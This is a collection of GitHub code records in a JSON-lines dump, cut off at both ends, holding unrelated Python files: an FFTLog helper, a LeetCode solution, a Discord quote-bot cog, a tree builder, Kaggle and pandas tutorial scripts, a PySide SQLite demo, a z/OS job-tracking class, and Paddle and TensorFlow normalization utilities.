self.Nmax / 2):\n Coef[i] = np.conj(tmp[int(self.Nmax / 2 - i)]) * self.xmin**(-self.Pow[i]) / float(self.Nmax)\n else:\n Coef[i] = tmp[int(i - self.Nmax / 2)] * self.xmin**(-self.Pow[i]) / float(self.Nmax)\n\n if window is not None:\n Coef = Coef * CoefWindow(self.Nmax, window=window)\n else:\n Coef[0] /= 2.\n Coef[self.Nmax] /= 2.\n\n return Coef\n\n def sumCoefxPow(self, xin, f, x, window=1):\n Coef = self.Coef(xin, f, window=window)\n fFFT = np.empty_like(x)\n for i, xi in enumerate(x):\n fFFT[i] = np.real(np.sum(Coef * xi**self.Pow))\n return fFFT\n","repo_name":"pierrexyz/pybird","sub_path":"pybird/fftlog.py","file_name":"fftlog.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"54"} +{"seq_id":"24868712458","text":"'''\nGiven the array candies and the integer extraCandies, where candies[i] represents the number of candies that the ith kid has.\n\nFor each kid check if there is a way to distribute extraCandies among the kids such that he or she can have the \ngreatest number of candies among them. Notice that multiple kids can have the greatest number of candies.\ne.g.\nInput: candies = [2,3,5,1,3], extraCandies = 3\nOutput: [true,true,true,false,true] \n'''\nclass Solution:\n def kidsWithCandies(self, candies: List[int], extraCandies: int) -> List[bool]:\n \n #Slow runtime, reduce somehow\n highest = max(candies)\n empty = [0] * len(candies)\n \n for i in range(len(candies)):\n if (highest - extraCandies) <= candies[i]:\n empty[i] = True\n else:\n empty[i] = False\n return empty\n","repo_name":"Ajat98/LeetCode-2020-Python","sub_path":"easy/kids_candies.py","file_name":"kids_candies.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26402884016","text":"from discord.ext import commands\nimport json\nimport os\nimport random\n\nclass quote(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(description=\"Saves the last message sent in the channel, or another message from its ID\", aliases=[\"q\"])\n async def quote(self, ctx, target_message=''): #add support for pinning from message IDs\n \n quotes_file_path = ('commands\\\\quote\\\\quotes.json' if os.name == 'nt' else 'commands/quote/quotes.json') #changes the path format based on the OS\n \n try:\n if target_message == '': #if no message ID is given\n #gets the last message sent in the channel\n counter = 0\n for message in await ctx.channel.history(limit=2).flatten(): #.history also gets the message used to trigger the command\n if counter > 0:\n quote = message\n counter += 1\n else:\n quote = await ctx.channel.fetch_message(int(target_message))\n except:\n await ctx.send(\"Not a valid message ID\")\n print(\"\\n!!!Could not find message ID, ignore below traceback!!!\\n\\n\")\n \n #opens the json file, parses and stores the contents in a var, modifies it, and dumps it back\n with open(quotes_file_path, 'r+') as quotes_file:\n quotes = json.loads(quotes_file.read())\n quotes['quotes'].append({str(quote.author.id):quote.content})\n with open(quotes_file_path, 'w+') as quotes_file:\n json.dump(quotes, quotes_file)\n\n await ctx.send(\"Quote saved!\")\n\n\n\n @commands.command(description=\"Sends a random saved message. Include a user ping to send a random saved message from that person\", aliases=[\"rq\"])\n async def randomquote(self, ctx, *, user=''):\n \n quotes_file_path = ('commands\\\\quote\\\\quotes.json' if os.name == 'nt' else 'commands/quote/quotes.json')\n \n with open(quotes_file_path, 'r+') as quotes_file:\n quotes = json.loads(quotes_file.read())\n \n if user == '': #if no user is given\n output_quote = random.choice(quotes['quotes'])\n else: #if a user is given\n user_quotes = []\n for quote in quotes['quotes']:\n '''\n each quote is a dict with the author id as the key and the text as the value\n 'user' is the user mention as str\n it must be sliced to not display the <@!> around the id itself\n '''\n quote_author = str(list(quote.keys())[0])\n if quote_author == user[3:-1]:\n user_quotes.append(quote)\n output_quote = random.choice(user_quotes)\n\n\n output_quote_author_id = list(output_quote.keys())[0] #note that this is a str\n output_quote_text = list(output_quote.values())[0]\n\n #so it doesn't ping the author every time the quote is displayed\n output_quote_author = self.bot.get_user(int(output_quote_author_id))\n\n await ctx.send(f'*\"{output_quote_text}\"\\n -{output_quote_author.name}*')\n \n\n\n\ndef setup(bot):\n bot.add_cog(quote(bot))","repo_name":"Samdal/RowBot","sub_path":"commands/quote/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"39568282015","text":"\"\"\"\nComplete the buildTree function which takes the inorder and postorder traversal sequences of a tree as input arguments. The function then constructs the corresponding binary tree and returns it.\n\"\"\"\ndef buildTree(inorder,preorder): \n \n if len(preorder) == 0 and len(inorder) == 0:\n return None\n \n else:\n binary_tree = ListBinaryTree(preorder[0])\n \"\"\"EXAMPLE: // INORDER = 0123456789 // PREORDER = 4321098765 \"\"\"\n\n #GET THE ROOT VALUE OF BOTH SEQUENCES\n root_value = preorder[0] #4\n inorder_root_index = inorder.find(root_value) #4 is at index 4 FIND THE ROOT VALUE IN THE INORDER SEQUENCE\n\n #SPLIT THE INORDER SEQUENCE IN HALF TO GET SUBTREES\n inorder_left_subtree = inorder[:inorder_root_index] #[:4] so 0123\n inorder_right_subtree = inorder[inorder_root_index + 1:] #4+1 = 5 AND [5:] so 56789\n\n #SPLIT THE PREORDER SEQUENCE IN HALF TO GET SUBTREES\n preorder_left_subtree = preorder[1:inorder_root_index + 1] #3210\n preorder_right_subtree = preorder[inorder_root_index + 1:] #98765\t \n\n #CREATE TREE IN PREORDER TRAVERSAL // left tree, root value, right tree\n construct_tree = buildTree(inorder_left_subtree, preorder_left_subtree)\n binary_tree.insert_tree_left(construct_tree)\n construct_tree = buildTree(inorder_right_subtree, preorder_right_subtree)\n binary_tree.insert_tree_right(construct_tree)\n\n return binary_tree\n\ntree = buildTree(\"42513\",\"12453\")\nprint(tree) #[1, [2, [4, None, None], [5, None, None]], [3, None, None]]\n\ntree = buildTree(\"CS105\",\"0SC15\")\nprint(tree) #[0, [S, [C, None, None], [1, None, None]], [5, None, None]]\n","repo_name":"trishalapiz/CS105-2018","sub_path":"A2 Part 2/A2P2_buildTree.py","file_name":"A2P2_buildTree.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2471272115","text":"import pandas as pd\nfrom sklearn.ensemble import RandomForestRegressor as RF\n\n#read the data\ntrain = pd.read_csv('../input/train.csv')\ntest = pd.read_csv('../input/test.csv')\n\n#we'll modify the sample submission file to make our submission\nsubmission = pd.read_csv('../input/sample_submission.csv')\n\n#prep the data for sklearn by separating predictors and response\nX = train.drop('Hazard', axis = 1)\ny = train['Hazard']\n\n#one-hot the categoricals\nnum_X = pd.get_dummies(X)\nnum_Xt = pd.get_dummies(test)\n\n#fit the model and predict\nmodel = RF().fit(num_X,y)\nprediction = model.predict(num_Xt)\n\n#write the submission file\nsubmission['Hazard'] = prediction\nsubmission.to_csv('basic_RF.csv', index = False)","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/liberty-mutual-group-property-inspection-prediction/jwjohnson314/basic-random-forest-w-sklearn.py","file_name":"basic-random-forest-w-sklearn.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"17061272534","text":"import sys\nfrom helpers import absPath\nfrom PySide6.QtSql import QSqlDatabase, QSqlQuery\n\n\n# Crea la conexión\nconexion = QSqlDatabase.addDatabase(\"QSQLITE\")\nconexion.setDatabaseName(absPath(\"Contactos.db\"))\n\n# Abra la conexión\nif not conexion.open():\n print(\"No se puede conectar a la base de datos\")\n sys.exit(True)\nelse:\n print(\"¿Conexión establecida?\", conexion.isOpen())\n\n# Cree una consulta y ejecútela de inmediato usando .exec ()\nconsulta = QSqlQuery()\nconsulta.exec_(\"DROP TABLE IF EXISTS contactos\")\nconsulta.exec_(\"\"\"\n CREATE TABLE IF NOT EXISTS contactos (\n id INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE NOT NULL,\n nombre VARCHAR(40) NOT NULL,\n empleo VARCHAR(50),\n email VARCHAR(40) NOT NULL\n )\"\"\")\n\n# Ejecución de consultas dinámicas: formato de cadena\nnombre, empleo, email = \"Héctor\", \"Instructor\", \"hector@ejemplo.com\"\n\nconsulta.exec_(f\"\"\"\n INSERT INTO contactos (nombre, empleo, email)\n VALUES ('{nombre}', '{empleo}', '{email}')\"\"\")\n\n# Ejecución de consultas dinámicas: parámetros de marcador de posición\ncontactos = [\n (\"Manuel\", \"Desarrollador Web\", \"manuel@ejemplo.com\"),\n (\"Lorena\", \"Gestora de proyectos\", \"lorena@ejemplo.com\"),\n (\"Javier\", \"Analista de datos\", \"javier@ejemplo.com\"),\n (\"Marta\", \"Experta en Python\", \"marta@ejemplo.com\")\n]\n\nconsulta = QSqlQuery()\nconsulta.prepare(\"\"\"\n INSERT INTO contactos (nombre, empleo, email) VALUES (?, ?, ?)\"\"\")\n\n# usamos .addBindValue () para insertar datos\nfor nombre, empleo, email in contactos:\n consulta.addBindValue(nombre)\n consulta.addBindValue(empleo)\n consulta.addBindValue(email)\n consulta.exec_()\n\n# Consultar registros\nconsulta.exec_(\"SELECT nombre, empleo, email FROM contactos\")\n# ponemos el cursor en el primer registro\nif consulta.first():\n print(consulta.value(\"nombre\"),\n consulta.value(\"empleo\"),\n consulta.value(\"email\"))\n# Automatizmaos el cursor hasta el final\nwhile consulta.next():\n print(consulta.value(\"nombre\"),\n consulta.value(\"empleo\"),\n consulta.value(\"email\"))\n\n\n# Cerrar conexión a la base de datos\nconexion.close()\nprint(\"¿Conexión cerrada?\", not conexion.isOpen())\n","repo_name":"hektorprofe/curso-qt-pyside-udemy","sub_path":"Proyectos/Proyecto 02/consultas_final.py","file_name":"consultas_final.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"es","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"22175538316","text":"import collections\n\nimport time\nfrom ptg2 import zos\nfrom ptg2.context import use_system\nfrom ptg2.zos.jes import Job, find_dd_for_exec_pgm\nfrom ptg2.zos.jesutil import StartedTask\nfrom core.BaseTest import BaseTest\n\n\nclass JobTracking(object):\n \"\"\"\n Instance class that provides services to interact with started tasks and batch jobs.\n\n Typical usage:\n\n .. code-block:: python\n\n from core.Factories import Factory\n\n nav_rtptest = Factory.create_nav_class(product_code=self.product_code, lpar=self.connection.get_lpar(),\n ssid=self.connection.get_ssid(), userid=self.connection.get_userid(),\n auto_submit=self.auto_submit, debug_mode=self.debug_mode)\n\n nav_rtptest.start_test_suite()\n\n rc, self.jobinfo = self.process_option_6(nav_rtptest)\n\n \"\"\"\n\n def __init__(self, use_lpar, jobid=None, jobname=None):\n \"\"\"\n \n :param use_lpar: Name of the Lpar. This is typically the same LPAR in which the script is executing on (Required)\n :param jobid: ID of the batch job or started task of which to get an instance for. Can use this or jobname. \n :param jobname: Name of the batch job or started task of which to get an instance for. Can use this or jobid.\n \"\"\"\n self.use_lpar = use_lpar\n self.jobid = jobid\n self.jobname = jobname\n self.job_handle = None\n self.jobfile = None\n self.jcl_log = None\n self.started_task = None\n\n self.__set_job_handle()\n\n def __set_job_handle(self):\n \"\"\"\n Set the job_handle needed for when other methods in this class are used. \n :return: \n \"\"\"\n # if instance was created with no jobid, then we must be dealing with a started task so we need to get the jobid\n if self.jobid is None:\n self.started_task = StartedTask(self.jobname, system=self.use_lpar)\n if self.started_task.is_running():\n self.jobid = self.started_task.jobid\n else:\n raise Exception(\"Started Task by name '%s' is not running on indicated lpar '%s' \"\n % (self.jobname, self.use_lpar))\n\n with use_system(self.use_lpar):\n self.job_handle = Job.get(str(self.jobid))\n\n def wait_till_job_complete(self):\n \"\"\"\n Waits for a job to complete before returning. Messages are issued by PTG2 not this method.\n :return: Nothing\n \"\"\"\n self.job_handle.wait_for_job()\n\n def update_job_status(self):\n \"\"\"\n\n :return:\n \"\"\"\n self.job_handle.update()\n\n def get_job_step_return_codes(self, list_o_steps):\n \"\"\"\n Takes a list of step names in order of execution and obtains their return codes and returns them in an\n ordered dictionary to ensure dictionary represents step execution order.\n :param list_o_steps:\n :return: dictionary of step names and return codes\n \"\"\"\n stepname_rc_dict = collections.OrderedDict()\n\n for step_name in list_o_steps:\n stepname_rc_dict[step_name] = self.job_handle.step_result(step=step_name)\n return stepname_rc_dict\n\n def get_job_message_log(self, update=False):\n \"\"\"\n If not an \"update\" request gets the initial contents of the job spool file at the time of the call. If an update\n request is being made then gets the information added to the log since the last time this method was called.\n \n :return: Sets the class instance variable for access to the information. \n \"\"\"\n if update:\n return self.jobfile.added_lines()\n else:\n self.jobfile = self.job_handle.get_spool_file(\"JES2.JESMSGLG\")\n\n def get_job_jcl_log(self):\n \"\"\"\n Gets the entire contents of the jobs JESJCL log\n\n :return: Sets the class instance variable for access to the information.\n \"\"\"\n self.jcl_log = self.job_handle.get_spool_file(\"JES2.JESJCL\")\n\n def print_message_log(self, log_to_print=None):\n \"\"\"\n Prints the contents of the log requested or defaults to printing the the whole updated message log from the job\n at the time this method is called.\n\n :param log_to_print: \n :return: \n \"\"\"\n if log_to_print is None:\n if self.jobfile is None:\n self.get_job_message_log()\n\n for line in self.jobfile:\n print(line)\n else:\n for line in log_to_print:\n print(line)\n\n def search_whole_message_log(self, what_to_find):\n \"\"\"\n Searches for a string in the whole output file obtained. Be careful of usage as this method can return TRUE\n if string looking for is not unique and repeats as searches the contents of the log when called from the \n beginning.\n :param what_to_find: the string to find in the message log. \n :return: True if found or False if not.\n \"\"\"\n\n if self.jobfile.contains(what_to_find):\n return True\n else:\n return False\n\n def find_print_found_message_from_log(self, what, use_log=None, print_message=True):\n \"\"\"\n Finds the string(i.e. what) given in a log file and if found prints the matching string from the log file given.\n \n This method can be useful to validate a message exists and print its contents for visualization in a whole log \n file or just the updated part since the last time the log was accessed.\n \n Example:\n \n \n \n :param what: string to be found\n :param use_log: If provided searches the log file object given otherwise searches the whole jobfile object.\n :param print_message: Defaults to True in which if the message and the 'what' matches all or part of the message\n then its printed. Set to False if no print wanted.\n :return: the matching line in the log or None if not found\n \"\"\"\n\n if use_log is None:\n for line in self.jobfile:\n if what in line:\n if print_message:\n print(line)\n return line\n return None\n else:\n for line in use_log:\n if what in line:\n if print_message:\n print(line)\n return line\n return None\n\n def find_dii_address(self, log_to_search=None):\n \"\"\"\n Finds the address where PDT DII was loaded after successful PDT collection initialization by finding the\n PDT0182 message and extracting the ADDR= value.\n\n :param log_to_search: If provided searches the log file object given otherwise searches the whole jobfile object.\n :return:\n \"\"\"\n\n if log_to_search is None:\n search_log = self.jobfile\n else:\n search_log = log_to_search\n\n diiaddr_message = self.find_print_found_message_from_log('PDT0182', use_log=search_log, print_message=False)\n\n if diiaddr_message is not None:\n addr_start = str(diiaddr_message).find('ADDR=') + 5\n addr_end = str(diiaddr_message).find('FLAG', addr_start)\n dii_address = diiaddr_message[addr_start:addr_end]\n return dii_address\n else:\n return None\n\n def get_list_dsn_for_dd(self, dd_name, pgm_name):\n \"\"\"\n Uses PTG2 method to return list of DSN for a DD concatenation.\n\n :param dd_name: name of the DD to look at (e.g. \"STEPLIB\", \"PTIPLIB\", etc...)\n :param pgm_name: name of the program (i.e. PGM=PXMINICC) on the EXEC.\n :return: list of dataset names.\n \"\"\"\n return find_dd_for_exec_pgm(self.jcl_log.read(), pgm_name, dd_name)\n\n def search_all_loadlibs_for_mem(self, dd_name, pgm_name, request_member):\n \"\"\"\n Finds and searches all the datasets in a DD concatenation for the member requested and returns the first loadlib\n DSN it was found in.\n\n :param dd_name: name of the DD to search. i.e. STEPLIB, PTILIB, etc...\n :param request_member: Member name to search for (e.g. PDTDIUC1, PDTDIIC2, etc...)\n :return: first loadlib DSN where member was found.\n \"\"\"\n if self.jcl_log is None:\n self.get_job_jcl_log()\n\n ds_name_list = find_dd_for_exec_pgm(self.jcl_log.read(), pgm_name, dd_name)\n\n for single_ds_name in ds_name_list:\n for dsn_member in zos.listmembers(single_ds_name):\n if dsn_member == request_member:\n return single_ds_name\n\n def find_message_with_timer(self, what, duration, print_timer=True):\n \"\"\"\n\n\n :param what:\n :param duration:\n :param print_timer:\n :return:\n \"\"\"\n\n wait_for = 5\n total_wait = 0\n\n if duration < wait_for:\n wait_for = duration\n\n while True:\n updated_log = self.get_job_message_log(update=True)\n # self.print_message_log(log_to_print=updated_log)\n if self.find_print_found_message_from_log(what, use_log=updated_log):\n return updated_log\n else:\n BaseTest.countdown_timer(wait_for, watch_timer=print_timer)\n total_wait = wait_for + total_wait\n if total_wait > duration:\n return None\n","repo_name":"prowler0305/rtp_test_framework","sub_path":"rtppy/core/JobTracking.py","file_name":"JobTracking.py","file_ext":"py","file_size_in_byte":9550,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"12623975091","text":"import pathlib\nimport warnings\nfrom typing import Union, Optional, List, Tuple, Text, BinaryIO\n\nimport math\nimport matplotlib.pyplot as plt\nimport paddle\nfrom PIL import Image\n\nplt.switch_backend('agg')\n\n\ndef pad_sequence(sequences: List[paddle.Tensor],\n batch_first: bool = False,\n padding_value: float = 0.0) -> paddle.Tensor:\n r\"\"\"Pad a list of variable length Tensors with ``padding_value``\n ``pad_sequence`` stacks a list of Tensors along a new dimension,\n and pads them to equal length. For example, if the input is list of\n sequences with size ``L x *`` and if batch_first is False, and ``T x B x *``\n otherwise.\n `B` is batch size. It is equal to the number of elements in ``sequences``.\n `T` is length of the longest sequence.\n `L` is length of the sequence.\n `*` is any number of trailing dimensions, including none.\n Example:\n >>> a = paddle.ones(25, 300)\n >>> b = paddle.ones(22, 300)\n >>> c = paddle.ones(15, 300)\n >>> pad_sequence([a, b, c]).shape\n paddle.Tensor([25, 3, 300])\n Note:\n This function returns a Tensor of size ``T x B x *`` or ``B x T x *``\n where `T` is the length of the longest sequence. This function assumes\n trailing dimensions and type of all the Tensors in sequences are same.\n Args:\n sequences (list[Tensor]): list of variable length sequences.\n batch_first (bool, optional): output will be in ``B x T x *`` if True, or in\n ``T x B x *`` otherwise\n padding_value (float, optional): value for padded elements. Default: 0.\n Returns:\n Tensor of size ``T x B x *`` if :attr:`batch_first` is ``False``.\n Tensor of size ``B x T x *`` otherwise\n \"\"\"\n\n # assuming trailing dimensions and type of all the Tensors\n # in sequences are same and fetching those from sequences[0]\n max_size = paddle.shape(sequences[0])\n # (TODO Hui Zhang): slice not supprot `end==start`\n # trailing_dims = max_size[1:]\n trailing_dims = tuple(\n max_size[1:].numpy().tolist()) if sequences[0].ndim >= 2 else ()\n max_len = max([s.shape[0] for s in sequences])\n if batch_first:\n out_dims = (len(sequences), max_len) + trailing_dims\n else:\n out_dims = (max_len, len(sequences)) + trailing_dims\n out_tensor = paddle.full(out_dims, padding_value, sequences[0].dtype)\n for i, tensor in enumerate(sequences):\n length = tensor.shape[0]\n # use index notation to prevent duplicate references to the tensor\n if batch_first:\n # TODO (Hui Zhang): set_value op not supprot `end==start`\n # TODO (Hui Zhang): set_value op not support int16\n # TODO (Hui Zhang): set_varbase 2 rank not support [0,0,...]\n # out_tensor[i, :length, ...] = tensor\n if length != 0:\n out_tensor[i, :length] = tensor\n else:\n out_tensor[i, length] = tensor\n else:\n # TODO (Hui Zhang): set_value op not supprot `end==start`\n # out_tensor[:length, i, ...] = tensor\n if length != 0:\n out_tensor[:length, i] = tensor\n else:\n out_tensor[length, i] = tensor\n\n return out_tensor\n\n\n@paddle.no_grad()\ndef make_grid(tensor: Union[paddle.Tensor, List[paddle.Tensor]], nrow: int = 8, padding: int = 2,\n normalize: bool = False,\n value_range: Optional[Tuple[int, int]] = None, scale_each: bool = False, pad_value: int = 0,\n **kwargs) -> paddle.Tensor:\n if not (isinstance(tensor, paddle.Tensor) or (\n isinstance(tensor, list) and all(isinstance(t, paddle.Tensor) for t in tensor))):\n raise TypeError(f'tensor or list of tensors expected, got {type(tensor)}')\n\n if \"range\" in kwargs.keys():\n warning = \"range will be deprecated, please use value_range instead.\"\n warnings.warn(warning)\n value_range = kwargs[\"range\"]\n\n # if list of tensors, convert to a 4D mini-batch Tensor\n if isinstance(tensor, list):\n tensor = paddle.stack(tensor, axis=0)\n\n if tensor.dim() == 2: # single image H x W\n tensor = tensor.unsqueeze(0)\n if tensor.dim() == 3: # single image\n if tensor.shape[0] == 1: # if single-channel, convert to 3-channel\n tensor = paddle.concat((tensor, tensor, tensor), 0)\n tensor = tensor.unsqueeze(0)\n if tensor.dim() == 4 and tensor.shape[1] == 1: # single-channel images\n tensor = paddle.concat((tensor, tensor, tensor), 1)\n\n if normalize is True:\n if value_range is not None:\n assert isinstance(value_range,\n tuple), \"value_range has to be a tuple (min, max) if specified. min and max are numbers\"\n\n def norm_ip(img, low, high):\n img.clip(min=low, max=high)\n img = img - low\n img = img / max(high - low, 1e-5)\n\n def norm_range(t, value_range):\n if value_range is not None:\n norm_ip(t, value_range[0], value_range[1])\n else:\n norm_ip(t, float(t.min()), float(t.max()))\n\n if scale_each is True:\n for t in tensor: # loop over mini-batch dimension\n norm_range(t, value_range)\n else:\n norm_range(tensor, value_range)\n\n if tensor.shape[0] == 1:\n return tensor.squeeze(0)\n\n # make the mini-batch of images into a grid\n nmaps = tensor.shape[0]\n xmaps = min(nrow, nmaps)\n ymaps = int(math.ceil(float(nmaps) / xmaps))\n height, width = int(tensor.shape[2] + padding), int(tensor.shape[3] + padding)\n num_channels = tensor.shape[1]\n grid = paddle.full((num_channels, height * ymaps + padding, width * xmaps + padding), pad_value)\n k = 0\n for y in range(ymaps):\n for x in range(xmaps):\n if k >= nmaps:\n break\n grid[:, y * height + padding:(y + 1) * height, x * width + padding:(x + 1) * width] = tensor[k]\n k = k + 1\n return grid\n\n\n@paddle.no_grad()\ndef save_image(tensor: Union[paddle.Tensor, List[paddle.Tensor]], fp: Union[Text, pathlib.Path, BinaryIO],\n format: Optional[str] = None,\n **kwargs) -> None:\n grid = make_grid(tensor, **kwargs)\n ndarr = paddle.clip(grid * 255 + 0.5, 0, 255).cast(\"uint8\").numpy()\n im = Image.fromarray(ndarr)\n im.save(fp, format=format)\n","repo_name":"DrownFish19/cfd-gcn-paddle","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":6432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35976080289","text":"\n# =============================================================================\n# Preparing file to be used (not in datacamp tutorial)\n# =============================================================================\nimport pandas as pd\n\nfile = \"pennsylvania2012_turnout.csv\"\n\ndata = pd.read_csv(file)\n\ndf = pd.DataFrame(data) # or set ,index_col=\"count\"\n\n# Remove index\ndf.set_index(\"county\", inplace=True)\n\n# Use only the first 7 columns\ndf = df.iloc[:, :6]\n\n# =============================================================================\n# Tutorials\n# =============================================================================\n\n#1\n# Your job is to select 'Bedford' county and the 'winner' column\nprint(df.loc['Bedford', 'winner'])\n\n\n\n#2\n# Indexing and Column Rearrangement\n\n# Read in filename and set the index: election\nelection = pd.read_csv(file, index_col='county')\n\n# Create a separate dataframe with the columns ['winner', 'total', 'voters']: results\nresults = pd.DataFrame(election[['winner', 'total', 'voters']])\n\n# Print the output of results.head()\nprint(results.head())\n\n\n\n\n#3 \n\n# Slice the row labels 'Perry' to 'Potter': p_counties\np_counties = election.loc[\"Perry\":\"Potter\"]\n\n# Print the p_counties DataFrame\nprint(p_counties)\n\n# Slice the row labels 'Potter' to 'Perry' in reverse order: p_counties_rev\np_counties_rev = election.loc[\"Potter\":\"Perry\":-1]\n\n# Print the p_counties_rev DataFrame\nprint(p_counties_rev)\n\n\n\n\n#4 \n\n# Slice the columns from the starting column to 'Obama': left_columns\nleft_columns = election.iloc[:, 0:3]\n\n# Print the output of left_columns.head()\nprint(left_columns.head())\n\n# Slice the columns from 'Obama' to 'winner': middle_columns\nmiddle_columns = election.iloc[:, 2:5]\n\n# Print the output of middle_columns.head()\nprint(middle_columns.head())\n\n# Slice the columns from 'Romney' to the end: 'right_columns'\nright_columns = election.iloc[:, 3:]\n\n# Print the output of right_columns.head()\nprint(right_columns.head())\n\n\n\n\n\n#5 Subselecting dataframes with lists\n\n# Create the list of row labels: rows\nrows = ['Philadelphia', 'Centre', 'Fulton']\n\n# Create the list of column labels: cols\ncols = ['winner', 'Obama', 'Romney']\n\n# Create the new DataFrame: three_counties\nthree_counties = pd.DataFrame(election.loc[rows, cols])\n\n# Print the three_counties DataFrame\nprint(three_counties)\n\n\n\n\n#6 Filtering data with Boolean expression \n\n# Create the boolean array: high_turnout\nhigh_turnout = election.loc[:, 'turnout'] > 70\n\n# Filter the election DataFrame with the high_turnout array: high_turnout_df\nhigh_turnout_df = election.loc[high_turnout]\n\n# Print the high_turnout_results DataFrame\nprint(high_turnout_df)\n\n\n\n\n#7 Filtering columns using other columns\n\n# Import numpy\nimport numpy as np\n\n# Create the boolean array: too_close\ntoo_close = election['margin'] < 1\n\n# Assign np.nan to the 'winner' column where the results were too close to call\nelection.loc[too_close, 'winner'] = np.nan\n\n# Print the output of election.info()\nprint(election.info())\n\n\n\n\n#8 Filtering using NaNs\n\nfile = \"titanic.csv\"\ntitanic = pd.read_csv(file)\n\n# Select the 'age' and 'cabin' columns: df\ndf = titanic.loc[:, ['age','cabin']]\n\n# Print the shape of df\nprint(df.shape)\n\n# Drop rows in df with how='any' and print the shape\nprint(df.dropna(how='any').shape)\n\n# Drop rows in df with how='all' and print the shape\nprint(df.dropna(how='all').shape)\n\n# Drop columns in titanic with less than 1000 non-missing values\nprint(titanic.dropna(thresh=1000, axis='columns').info())\n\n\n\n\n\n","repo_name":"mattfemia/datacamp","sub_path":"manipulatingdf/extract-transform.py","file_name":"extract-transform.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2167624981","text":"\"\"\"\nDivisive normalization implementation.\n\nSee paper Normalizing the Normalizers: Comparing and Extending Network\nNormalization Schemes. Mengye Ren*, Renjie Liao*, Raquel Urtasun, Fabian H.\nSinz, Richard S. Zemel. 2016. https://arxiv.org/abs/1611.04520\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\nimport tensorflow as tf\n\n\ndef div_norm_2d(\n x,\n sum_window,\n sup_window,\n strides,\n padding,\n gamma=None,\n beta=None,\n layer=None,\n eps=1.0,\n scope=None,\n name=\"dn_out\",\n return_mean=False):\n \"\"\"Applies divisive normalization on CNN feature maps.\n Collect mean and variances on x on a local window across channels.\n And apply normalization as below:\n x_ = gamma * (x - mean) / sqrt(var + eps) + beta\n https://github.com/renmengye/div-norm/blob/master/div_norm.py\n\n Args:\n x: Input tensor, [B, H, W, C].\n sum_window: Summation window size, [H_sum, W_sum].\n sup_window: Suppression window size, [H_sup, W_sup].\n gamma: Scaling parameter.\n beta: Bias parameter.\n eps: Denominator bias.\n return_mean: Whether to also return the computed mean.\n\n Returns:\n normed: Divisive-normalized variable.\n mean: Mean used for normalization (optional).\n \"\"\"\n if not isinstance(sum_window, list):\n sum_window = list(np.repeat(sum_window, 2))\n if not isinstance(sup_window, list):\n sup_window = list(np.repeat(sup_window, 2))\n\n if scope is None:\n scope = '%s_%s' % (layer['names'][0], layer['normalization'][0])\n with tf.variable_scope(scope):\n w_sum = tf.ones(sum_window + [1, 1]) / np.prod(np.array(sum_window))\n w_sup = tf.ones(sup_window + [1, 1]) / np.prod(np.array(sup_window))\n x_mean = tf.reduce_mean(x, [3], keep_dims=True)\n x_mean = tf.nn.conv2d(\n x_mean,\n w_sum,\n strides=strides,\n padding=padding)\n normed = x - x_mean\n x2 = tf.square(normed)\n x2_mean = tf.reduce_mean(x2, [3], keep_dims=True)\n x2_mean = tf.nn.conv2d(\n x2_mean,\n w_sup,\n strides=strides,\n padding=padding)\n denom = tf.sqrt(x2_mean + eps)\n normed = normed / denom\n if gamma is None:\n gamma = tf.get_variable(\n name='%s_%s' % ('gamma', scope),\n initializer=1.)\n normed *= gamma\n if beta is not None:\n beta = tf.get_variable(\n name='%s_%s' % ('beta', scope),\n initializer=0.)\n normed += beta\n normed = tf.identity(normed, name='%s_%s' % (scope, name))\n if return_mean:\n return normed, x_mean\n else:\n return normed\n\n\ndef div_norm_1d(\n x,\n sum_window,\n sup_window,\n strides,\n padding,\n gamma=None,\n beta=None,\n layer=None,\n eps=1.0,\n scope='dn',\n name=\"dn_out\",\n return_mean=False):\n \"\"\"Applies divisive normalization on fully connected layers.\n Collect mean and variances on x on a local window. And apply\n normalization as below:\n x_ = gamma * (x - mean) / sqrt(var + eps) + beta\n\n Args:\n x: Input tensor, [B, D].\n sum_window: Summation window size, W_sum.\n sup_window: Suppression window size, W_sup.\n gamma: Scaling parameter.\n beta: Bias parameter.\n eps: Denominator bias.\n return_mean: Whether to also return the computed mean.\n\n Returns:\n normed: Divisive-normalized variable.\n mean: Mean used for normalization (optional).\n \"\"\"\n\n if scope is None:\n scope = '%s_%s' % (layer['names'][0], layer['normalization'][0])\n with tf.variable_scope(scope):\n x = tf.expand_dims(x, 2)\n w_sum = tf.ones([sum_window, 1, 1], dtype='float') / float(sum_window)\n w_sup = tf.ones([sup_window, 1, 1], dtype='float') / float(sup_window)\n mean = tf.nn.conv1d(x, w_sum, stride=strides, padding=padding)\n x_mean = x - mean\n x2 = tf.square(x_mean)\n var = tf.nn.conv1d(x2, w_sup, stride=strides, padding=padding)\n normed = (x - mean) / tf.sqrt(eps + var)\n normed = tf.squeeze(normed, [2])\n mean = tf.squeeze(mean, [2])\n if gamma is None:\n gamma = tf.get_variable(\n name='%s_%s' % ('gamma', scope),\n initializer=1.)\n normed *= gamma\n if beta is not None:\n beta = tf.get_variable(\n name='%s_%s' % ('beta', scope),\n 